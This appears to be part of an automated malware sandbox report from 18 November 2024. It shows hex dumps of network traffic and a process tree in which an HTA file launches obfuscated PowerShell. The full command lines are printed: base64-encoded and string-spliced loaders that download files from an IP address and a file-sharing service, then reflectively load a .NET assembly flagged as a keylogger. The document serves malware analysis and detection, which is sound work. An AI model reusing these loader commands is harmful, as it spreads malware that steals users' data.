                                                                                                                                                                                                                                Data Ascii: xC"!x;1coXkY^{lfHuWDaQs!8gbjq6~9^)aL{D*-vKv2,1nkZ`y2V2F^^a;{h'J]lrGs7VzIP Dn2k136w8xWuE<`ZT|uKCc$u~l
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC1378INData Raw: f6 8f 48 d5 27 4c 9d 21 67 cf 13 d5 fd 28 ef 16 fb ab 5b b1 72 6f 45 f7 8a 4f da b3 e7 94 c8 03 e1 ba 8f ea 98 8d ad 70 5b 75 d3 db 31 31 1e 65 20 3f 73 03 a7 8c c0 5d 02 07 98 cf a2 15 9d ee 3b 96 d8 5b 6e bd d6 e7 1c e9 c6 a6 3c ec 04 df 03 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 1b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 8e cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee b9 e4 ce 81 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 1e cc c8 00 69 9f 41 62 95 20 df bd 2c b1 bf 6b be 5b ba 52 77 ca c0 9b 04 7c b7 44 3b 68 e6 61 cf 76 78 4c 3a 74 24 9e d6 21 da de bf f7 1b 89 3f 5c 33 4b 7c e7 5f 9b f5 e1 23 f2 f7 8f ff 83 bf 91 02 97 ae 8d 7f 06 9c bd 4c 5d 83 7b e3 6b 6c 38 41 a1 10 8f 67 d6 26 30 9e 29 6c 6d ce c7 a7 68 e7 66 09 91 a0 a4 e8 82 d5
                                                                                                                                                                                                                                Data Ascii: H'L!g([roEOp[u11e ?s];[n<jOpD1j=h&U?%h@Q6PlNf"wiAb ,k[Rw|D;havxL:t$!?\3K|_#L]{kl8Ag&0)lmhf
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC1378INData Raw: bd 21 33 d5 4d 7a 30 92 e6 a0 73 01 69 4f 6c e7 64 e7 06 c4 1f cd ca 43 29 99 d5 a9 e4 d2 27 1d 24 47 c6 70 b9 db 83 b8 ff e3 7b 43 fd 1c bd 60 8e 2a b8 9e 3b 74 be 19 0c 65 10 ff b7 71 9b 03 75 c2 bc 05 66 42 30 d4 bd 44 4c 1f e0 98 f8 e0 5e 51 d6 09 16 ee 62 8a 41 64 da 7a 3d 5a 33 a2 f1 1d 19 2a c9 80 f3 07 8d 29 4d f6 90 9d 6a f4 d8 56 61 85 9f 3a ce 4e 59 a7 6e a9 e5 ea 31 ff db f8 7b 43 fb aa 2b b5 c2 4c a8 10 57 3e 9d 12 73 e0 51 5f ef a3 40 64 48 ab 09 6b 6a 14 35 a1 2f 83 cb 26 d1 e4 cb 9d b8 cb 6e d2 3d 1d 90 fa 7e 9d 1e 6b cc d2 f8 7b 2e c6 37 f3 df 63 e9 ba ef fe 7d de f2 f4 a7 e7 2c 7f fb ee 20 7d 36 a6 a6 6a 7f 3b 2b 59 eb 18 b5 6f b9 8e 0b c1 c7 7b c1 1d 95 99 f6 ad e8 d4 b5 e8 6c ed 3f a7 af c2 af 3f 73 bf 3d ff ef 77 2d 1d cf 3d 1a be 73
                                                                                                                                                                                                                                Data Ascii: !3Mz0siOldC)'$Gp{C`*;tequfB0DL^QbAdz=Z3*)MjVa:NYn1{C+LW>sQ_@dHkj5/&n=~k{.7c}, }6j;+Yo{l??s=w-=s
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC1378INData Raw: 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 76 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 3d 6f dc 30 0c dd fb 2b 08 cf 46 70 fd 1c b2 05 08 d0 a1 45 53 a4 59 02 64 61 4e b4 23 48 a6 04 8a 72 72 08 f2 df 4b 9d 7d 08 ce e8 d0 45 03 45 be f7 f8 1e 5f bb bd 10 2a 31 3d 77 97 af dd 44 a5 e0 48 dd 65 f7 e7 c7 d5 ef 2b f8 75 7f 77 d7 bd f5 1d bd e4 88 8c ea 13 a7 61 88 9e c9 f9 82 8f 91 dc f9 d4 75 85 87 ba db d1 17 81 b5 ef 02 6e 26 70 15 66 1f 23 20 cf cb 37 3b 84 ef 29 8d 91 e0 3a 85 3a 11 2b 54 45 06 cf 4a c2 a4 35 e7 90 72 36 84 b1 3f 42 0e df 72 66 b4 ff a2 0b 44 8c 6c
                                                                                                                                                                                                                                Data Ascii: !-_locales/sv/messages.jsonUTPf R=o0+FpESYdaN#HrrK}EE_*1=wDHe+uwaun&pf# 7;)::+TEJ5r6?BrfDl
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC1378INData Raw: 4c 28 b9 28 68 15 81 3d 3a d0 47 7f 87 f5 aa c5 a0 2c 48 96 b4 9f 93 24 bf 74 ca 3b a4 a0 f9 6a e6 a1 cc 40 81 91 19 30 5d a1 39 7e 39 01 48 39 a0 4f 22 d8 2a e1 e0 08 be e7 cf 6d 6c b8 0b be c9 03 07 28 7d 6a dc e2 3f 42 98 78 2d d6 a1 b1 19 12 f8 68 b4 04 85 9d 97 35 1c 1b 0c 16 5f 55 b4 c5 fe ea 43 28 83 0e 40 08 bf 0d 79 16 7a c3 cf 26 b0 46 00 0e 4b 9e 50 f8 ed 3b 0e 8c 5d 3c 0b 64 ca 72 2e 90 41 1f b1 d4 e7 ed 22 33 dd 46 8d 4d 1a 99 c7 e4 99 3c 21 86 b1 e4 d2 54 27 cf df ef 91 4e 01 0d 30 81 96 55 96 37 4e 3d d0 01 5c b2 ca 55 80 04 ec aa e2 2a 73 90 6b ac 51 58 5b 6a 0a 34 8b b4 b7 4f b0 0d b9 c6 2c a1 85 38 3d c9 71 2f 07 ef 6d df 60 8f b9 82 8c 87 80 43 e8 d4 88 fe 62 9f b4 94 b9 d7 66 ac 7c 82 88 1d 51 d1 f9 61 37 fe 39 d8 0a 53 59 ae f5 66 32
                                                                                                                                                                                                                                Data Ascii: L((h=:G,H$t;j@0]9~9H9O"*ml(}j?Bx-h5_UC(@yz&FKP;]<dr.A"3FM<!T'N0U7N=\U*skQX[j4O,8=q/m`Cbf|Qa79SYf2
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC1378INData Raw: 5b 7b 7a c3 30 ec 7c ed 63 70 f3 2d c2 2b 61 1b 8f d7 00 1b e0 cd 2b ef 78 f7 a3 67 c0 39 32 a9 1f 80 6c 66 17 97 d6 80 80 69 32 ab bf c3 f0 d2 d1 02 c6 d1 d1 ca 7f 28 f3 d3 05 cf d7 e6 67 96 67 73 39 3b dd 9e 5f c5 2e 08 52 5b 60 e6 23 e4 24 80 17 de cf 8c 32 61 22 26 18 40 81 51 37 1a 3d e4 69 36 45 18 6c 38 96 b1 f8 bc 04 25 63 8c 69 6f 0b 8e 93 22 11 da 2b e2 2e dd 3c 66 df 7d 3c c4 05 36 71 e2 c9 b8 a6 7e 66 b3 9b 73 21 3a a7 95 67 38 d4 83 89 c3 d7 91 64 de c5 5b 01 f5 ff a5 13 58 78 d8 a8 54 25 22 24 d8 16 40 cd 81 70 5e c5 3b d8 dd 55 72 b8 9e d6 48 15 06 41 57 68 5b e8 27 30 b1 82 0f e8 09 d8 f8 24 0d ae 73 05 91 20 6f 32 84 0d f0 82 95 ca 25 80 50 f5 46 fa 49 1e 46 5e 38 4e d2 28 ef db ce 9f 18 54 a7 c3 53 4b c7 26 a2 ba e4 21 00 dd 3a a8 e3 88
                                                                                                                                                                                                                                Data Ascii: [{z0|cp-+a+xg92lfi2(ggs9;_.R[`#$2a"&@Q7=i6El8%cio"+.<f}<6q~fs!:g8d[XxT%"$@p^;UrHAWh['0$s o2%PFIF^8N(TSK&!:
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC1378INData Raw: a8 15 a1 54 1e 5a 8d 72 3d e2 47 40 31 01 b6 e2 e3 20 ba 53 87 b9 64 39 96 a9 1f 50 8d c3 df 89 4f 3c 44 83 14 ce e2 33 f3 a3 46 d1 e2 45 58 a7 2c f7 48 0a 04 81 50 14 d0 11 86 4d 66 e7 ff be d5 aa ce 18 47 ec d9 2c f8 22 13 e5 35 27 b7 b0 97 2a bf 2c 0b d7 07 48 d7 30 c9 86 93 1f b0 17 3e b8 b1 bc a7 01 17 51 9c 66 55 50 9a b0 bb 80 25 f5 6f 33 e1 cf d4 9d 1c 93 ba 54 72 a7 e2 f6 75 97 90 fe 6f d2 46 10 67 11 75 4c 7e d0 94 af e3 4d 5d b4 38 17 ad 83 c4 09 26 df 24 fb 10 6d 5d e5 56 f8 11 0d 2d bb f3 2c 35 9d 43 aa d3 dc cc 21 ae 95 db 49 63 90 e8 bb b5 a2 31 68 28 4f c1 46 84 c4 ae 85 65 77 6e 1d 5c 72 28 c5 cb d9 9f 0c 82 36 6a 85 c3 0c cb 86 67 50 98 fd a8 5e 6f c5 03 8b 54 f3 c2 30 f0 94 72 6d 96 45 e2 75 68 b3 3c 02 83 6b 79 2f ae 25 09 87 d3 41 99
                                                                                                                                                                                                                                Data Ascii: TZr=G@1 Sd9PO<D3FEX,HPMfG,"5'*,H0>QfUP%o3TruoFguL~M]8&$m]V-,5C!Ic1h(OFewn\r(6jgP^oT0rmEuh<ky/%A
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC1378INData Raw: 02 18 e4 0f c3 f4 76 5f 5c be dd ce 6f 88 69 ac e4 50 fa ee 07 ab c8 a0 8b 52 e9 bb 55 6b fa 9f c6 22 3c 29 b7 da 31 d5 9e ae 5a b0 94 e9 7c 5c e7 66 a1 94 56 e8 81 c0 57 d2 a5 5b 41 6a 0e 92 60 dd 9b c4 c3 77 12 c5 dc 29 96 c5 76 0c 56 10 bf 85 d3 7f df 78 05 8d e2 78 fc 2e d0 e2 68 c5 5e ba e2 78 a2 f7 ae 74 a2 c9 5d 23 c5 a1 dd 77 87 05 87 09 52 cb 31 68 27 3d 4b 9d 65 b2 de 77 fd b1 ff 96 4d 3f 5e 60 b9 1e 38 a4 9e c8 b0 ea d5 db 24 51 55 05 52 b6 f2 27 f0 e4 fd 6c 75 91 a7 7f 43 1e 77 ee c0 54 0b 56 cd 31 4f 5e ee ea 9b de 9a b3 38 11 b7 da d9 f9 e5 0f 50 4b 07 08 fd 45 55 f9 17 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6d 6e 2f 6d 65 73 73 61 67 65 73 2e
                                                                                                                                                                                                                                Data Ascii: v_\oiPRUk"<)1Z|\fVW[Aj`w)vVxx.h^xt]#wR1h'=KewM?^`8$QUR'luCwTV1O^8PKEUPK!-_locales/mn/messages.


                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:10:52:13
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:mshta.exe "C:\Users\user\Desktop\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta"
                                                                                                                                                                                                                                Imagebase:0x330000
                                                                                                                                                                                                                                File size:13'312 bytes
                                                                                                                                                                                                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                Start time:10:52:14
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"
                                                                                                                                                                                                                                Imagebase:0x890000
                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:10:52:14
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:10:52:15
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
                                                                                                                                                                                                                                Imagebase:0x890000
                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:10:52:20
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"
                                                                                                                                                                                                                                Imagebase:0x8f0000
                                                                                                                                                                                                                                File size:2'141'552 bytes
                                                                                                                                                                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:10:52:21
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD4B.tmp" "c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP"
                                                                                                                                                                                                                                Imagebase:0xbe0000
                                                                                                                                                                                                                                File size:46'832 bytes
                                                                                                                                                                                                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:10:52:26
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
                                                                                                                                                                                                                                Imagebase:0x230000
                                                                                                                                                                                                                                File size:147'456 bytes
                                                                                                                                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:10:52:27
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                                                                Imagebase:0x890000
                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:10:52:28
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:10:52:28
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
                                                                                                                                                                                                                                Imagebase:0x890000
                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
